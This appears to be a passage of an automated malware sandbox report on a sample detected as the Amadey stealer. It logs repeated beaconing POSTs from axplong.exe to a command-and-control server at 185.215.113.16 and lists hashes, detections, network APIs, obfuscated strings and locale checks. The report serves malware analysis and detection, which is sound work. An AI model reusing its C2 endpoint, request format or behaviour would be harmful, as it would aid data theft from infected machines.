                    Date: Thu, 26 Sep 2024 23:44:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    60 | 192.168.2.8 | 49773 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:09.124342918 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:09.849025011 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    61 | 192.168.2.8 | 49774 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:09.966330051 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:10.665312052 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    62 | 192.168.2.8 | 49775 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:10.673729897 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:11.388468981 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    63 | 192.168.2.8 | 49776 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:11.571511030 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:12.273880959 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:12.279227018 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:12.503853083 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    64 | 192.168.2.8 | 49777 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:12.615863085 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:13.347182989 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    65 | 192.168.2.8 | 49778 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:13.356055021 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:14.054225922 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Target ID:0
                    Start time:19:42:07
                    Start date:26/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x660000
                    File size:1'874'944 bytes
                    MD5 hash:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1445064913.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1485335503.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:19:42:09
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x8a0000
                    File size:1'874'944 bytes
                    MD5 hash:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1476249631.0000000005090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1518475574.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 53%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    Target ID:3
                    Start time:19:42:10
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0x8a0000
                    File size:1'874'944 bytes
                    MD5 hash:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.1475590462.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.1519199500.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:8
                    Start time:19:43:00
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x8a0000
                    File size:1'874'944 bytes
                    MD5 hash:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000008.00000003.1978884229.0000000005090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                      • Opcode ID: 419d617193cea1dbd55cd61b48468fe5082b85ec7ba11024b2ed1f897fd03766
                      • Instruction ID: f5625058aaa7a0eea2918898a4cfa0a0e82228787b8a88838674c6c4d8c4c2b5
                      • Opcode Fuzzy Hash: 419d617193cea1dbd55cd61b48468fe5082b85ec7ba11024b2ed1f897fd03766
                      • Instruction Fuzzy Hash: FFB02BAE31010CED89027EB1608812E37D0E2C42213F00920E000C5800C57412438220

                      Execution Graph

                      Execution Coverage:8.8%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:6.5%
                      Total number of Nodes:541
                      Total number of Limit Nodes:23

                      Control-flow Graph

                      APIs
                      • InternetOpenW.WININET(008F8D70,00000000,00000000,00000000,00000000), ref: 008ABDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008ABE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 008ABE5A
                      • HttpSendRequestA.WININET(?,00000000), ref: 008ABF1B
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 008ABFCC
                      • InternetCloseHandle.WININET(?), ref: 008AC0A7
                      • InternetCloseHandle.WININET(?), ref: 008AC0AF
                      • InternetCloseHandle.WININET(?), ref: 008AC0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-332458646
                      • Opcode ID: dd2f9ad110c5285c8975d98a8af2138303d0de4efa5ab8e756978adc32293b37
                      • Instruction ID: 0c098c422f4aef5f41d2e5f1912772770a49167ef17e31402c22cd07ac87dccd
                      • Opcode Fuzzy Hash: dd2f9ad110c5285c8975d98a8af2138303d0de4efa5ab8e756978adc32293b37
                      • Instruction Fuzzy Hash: E0B1D4B16001189BEB24CF28CC84BEDBB69FF86304F5041A9F509D7682DB759AC4CB95
                      APIs
                        • Part of subcall function 008B7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 008B795C
                        • Part of subcall function 008B7870: __Cnd_destroy_in_situ.LIBCPMT ref: 008B7968
                        • Part of subcall function 008B7870: __Mtx_destroy_in_situ.LIBCPMT ref: 008B7971
                        • Part of subcall function 008ABD60: InternetOpenW.WININET(008F8D70,00000000,00000000,00000000,00000000), ref: 008ABDED
                        • Part of subcall function 008ABD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008ABE11
                        • Part of subcall function 008ABD60: HttpOpenRequestA.WININET(?,00000000), ref: 008ABE5A
                      • std::_Xinvalid_argument.LIBCPMT ref: 008B4EA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                      • API String ID: 2414744145-1662704651
                      • Opcode ID: 7e11424dab21f708a95a7b654583955b76d899d0b0ad7a892f7b528c8a6bae63
                      • Instruction ID: c2cbcb7b2f367006717276ffb0129e6fea3fa8a45a726ff5b4391ae44fe3dfba
                      • Opcode Fuzzy Hash: 7e11424dab21f708a95a7b654583955b76d899d0b0ad7a892f7b528c8a6bae63
                      • Instruction Fuzzy Hash: F023F3719002589BEB19DB28CD897DDBB76EB85314F5481D8E008E73D2EB399F848F52

                      Control-flow Graph
                      • API calls named in the graph: RegOpenKeyExA, RegEnumValueW
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: c07dadb6958895bcba2d39e7db51be66baf596a3f494e7ee1c9a855f8f008088
                      • Instruction ID: 4af57664cd010e03f77e134b62e35f05e730b55bf923185b25f07666e596ada3
                      • Opcode Fuzzy Hash: c07dadb6958895bcba2d39e7db51be66baf596a3f494e7ee1c9a855f8f008088
                      • Instruction Fuzzy Hash: 94E17C71900218ABEB24DBA4CC89BEEB779FF05300F5442D9E508E7691EB749BD48F52

                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008A7EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                      • API String ID: 1721193555-2057465332
                      • Opcode ID: f8a8752e379325c66d066252697098d903cfb973f0653aea4146055b80007ee4
                      • Instruction ID: 05072a7377ce37f95c9f0c08355db5ec8d150e821e2f9b5f910d4a086ba32054
                      • Opcode Fuzzy Hash: f8a8752e379325c66d066252697098d903cfb973f0653aea4146055b80007ee4
                      • Instruction Fuzzy Hash: CCD1B670E04618DBEB14AB2CCD4A3AD7B61FB82324F944298E415E77D2DB354E9187D3

                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 008D6E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 008D6E7D
                      • __dosmaperr.LIBCMT ref: 008D6F12
                        • Part of subcall function 008D7177: __dosmaperr.LIBCMT ref: 008D71AC
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: 71659d5a3ab1f88703cecfe36951666ccbada3051916307f71d4442411636cd2
                      • Instruction ID: a59e222599b1b1f25c4ca0d829ec1c1696179cdcc784af67a3b8f637bfabfdd0
                      • Opcode Fuzzy Hash: 71659d5a3ab1f88703cecfe36951666ccbada3051916307f71d4442411636cd2
                      • Instruction Fuzzy Hash: 96413C75900648AACB24DFB5E845DAFBBF9FF88300B10462EF556D3710EB30A954CB61

                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 008A8454
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: cc8eebfd0ffda4002dfac657b20c820f5624745cd56220e27f771fdece65e82a
                      • Instruction ID: a752bead02282939eade8cf76210c17be82472d44701c4293dc581e3398ed88b
                      • Opcode Fuzzy Hash: cc8eebfd0ffda4002dfac657b20c820f5624745cd56220e27f771fdece65e82a
                      • Instruction Fuzzy Hash: DA510770915218EBEB24EB28CD497DDB775FB46314F5042A9E804E77C1EF349A808BA5

                      Control-flow Graph
                      • API calls named in the graph: CreateFileW
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e540b117ebee228574799654f23600d88e70b8ea538bce20a6f5ef5f7a7270be
                      • Instruction ID: 7f3b9364811172c44ed1096bce6762a33f06cb4cbfd2757270cfcd5255017da1
                      • Opcode Fuzzy Hash: e540b117ebee228574799654f23600d88e70b8ea538bce20a6f5ef5f7a7270be
                      • Instruction Fuzzy Hash: 3E21D871A0160C6AEB117B68AC42B9E372AFF41338F204312F524EB3D1E7715D1596A2

                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 008D6FB3
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: 68f907b0ecf63f6f84260728e3724f25d0c21819c4f0e071c3d6c4296c74f3d4
                      • Instruction ID: b560f1210025f373f19698a0355a0ade45060862a1ff156b681d5c2971ddeede
                      • Opcode Fuzzy Hash: 68f907b0ecf63f6f84260728e3724f25d0c21819c4f0e071c3d6c4296c74f3d4
                      • Instruction Fuzzy Hash: 9E11E8B290060CAACB10DF95D984EDFB7BCEF08310F605267E512E6280EB30EB54CB61

                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: 7e008bf693c905153335ce0901627d2bf8d860ec03d472d76448f8dd75b43180
                      • Instruction ID: b44986b8c0e0266b0f0e19be890afc876d654ff15aa59db9387ac5a7c7b92415
                      • Opcode Fuzzy Hash: 7e008bf693c905153335ce0901627d2bf8d860ec03d472d76448f8dd75b43180
                      • Instruction Fuzzy Hash: 6A113AAB0BC110EF5543CB815E8C9F6375BBE567707308036F84797543E2F5460989E5

                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: bb49acc713bab6902a828db6570c8865182e69049b80624ac749524c36b37aa3
                      • Instruction ID: ba437c7ced11a3938d1e4e13088524941402de6c2a37b83666e972ca6111f78d
                      • Opcode Fuzzy Hash: bb49acc713bab6902a828db6570c8865182e69049b80624ac749524c36b37aa3
                      • Instruction Fuzzy Hash: 37113AEB07C110FF9503DB515E9CAF77B6BAE957307708025F8479A143E2F5460989E4

                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: 3a296eafa6f2ebc892b042aa4d047406ec1c6a9555634729dfa4fcf11d4251af
                      • Instruction ID: 123fbe509dfdda3fac771d94c12b6c6fe80159d4481d6d414137b27afbee72a6
                      • Opcode Fuzzy Hash: 3a296eafa6f2ebc892b042aa4d047406ec1c6a9555634729dfa4fcf11d4251af
                      • Instruction Fuzzy Hash: B7215BD74BD100BFD303D7519EAC5F63B6AEE573303314556E4868A053E1E1464A89E5

                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: fd34f495d64bf334b72765d91f853165de477555b8d9d5094ba09dc98aae865a
                      • Instruction ID: 911644695a66746e62cc6ddc9d1c789702956ec541c84d9234ccd7bc09e6b0ed
                      • Opcode Fuzzy Hash: fd34f495d64bf334b72765d91f853165de477555b8d9d5094ba09dc98aae865a
                      • Instruction Fuzzy Hash: 851157A717C110EFD643CBA15E9D9FA2B67AE53330730843AE84787543E2E5420D99A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID: `aXa
                      • API String ID: 0-463474586
                      • Opcode ID: 402ddc794f58f143454708f0128bf17cf8a055ba756509cfdc1bf2678127c1be
                      • Instruction ID: 59a3e5116d682455b43a3293d9929ddc387c59eae92880abc1e0d5e2b00c34d7
                      • Opcode Fuzzy Hash: 402ddc794f58f143454708f0128bf17cf8a055ba756509cfdc1bf2678127c1be
                      • Instruction Fuzzy Hash: D3012BA70BC100EF9506CB815D5D5BA7B57AF563307308426E8875A103E1F54A0959E5
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 95bd1648ae35d8da4ea3d2dad80aae983a0eb4ab5fb59ef40cc82a3a7b345307
                      • Instruction ID: 10aa05201394d675acc22af89ebb3300768bb9d610a950a7cd668b0263659b5c
                      • Opcode Fuzzy Hash: 95bd1648ae35d8da4ea3d2dad80aae983a0eb4ab5fb59ef40cc82a3a7b345307
                      • Instruction Fuzzy Hash: C4F06271A14604ABC7007B6C9D07B5D7B75F747B64F800258E821A73D2EA34590487E3
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_52a0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 880669c8c40ca5372bd3ecaae24f581a1064a724c236901e212a76cd8ee25177
                      • Instruction ID: 68ebc120a71a36eb74125bf9c734a4f20d0a3129d05213c57e4d423f1399dd92
                      • Opcode Fuzzy Hash: 880669c8c40ca5372bd3ecaae24f581a1064a724c236901e212a76cd8ee25177
                      • Instruction Fuzzy Hash: B20149A74BC100FFC602DB805D8CAB67B2BBE5A3307318027F88759402E2F5860C9EE5
                      Memory Dump Source
                      • Source File: 00000008.00000002.2698262630.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                      Joe Sandbox IDA Plugin
